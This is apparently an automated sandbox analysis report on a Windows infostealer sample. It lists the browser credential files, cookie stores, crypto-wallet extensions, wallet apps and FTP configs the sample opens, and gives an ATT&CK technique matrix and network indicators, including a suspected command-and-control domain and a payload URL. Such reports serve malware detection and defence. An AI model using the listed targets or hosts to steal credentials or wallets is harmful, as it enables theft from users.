              Source: file.exe, 00000000.00000003.2257984255.000000000161D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341055494.0000000001620000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242476682.0000000001620000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238525489.0000000001620000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363430838.000000000161B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.2257984255.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exe, 00000000.00000003.2257984255.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000000.00000003.2213284513.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exe, 00000000.00000003.2257984255.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2213284513.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.2257984255.000000000161D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000000.00000003.2213284513.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2213284513.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2117012787.0000000001629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2213209784.0000000001622000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2213156160.000000000161B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              Registry Run Keys / Startup Folder
              12
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Registry Run Keys / Startup Folder
              34
              Virtualization/Sandbox Evasion
              LSASS Memory751
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              12
              Process Injection
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/l0%Avira URL Cloudsafe
              https://property-imper.sbs/n&0%Avira URL Cloudsafe
              http://185.215.113.16/i0%Avira URL Cloudsafe
              http://185.215.113.16/off/def.exeb0%Avira URL Cloudsafe
              https://property-imper.sbs/apiE0%Avira URL Cloudsafe
              https://property-imper.sbs/api#0%Avira URL Cloudsafe
              https://property-imper.sbs/lv0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              172.67.162.84
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://property-imper.sbs/apifalse
                          high
                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_126.6.drfalse
                              high
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://185.215.113.16/off/def.exebfile.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
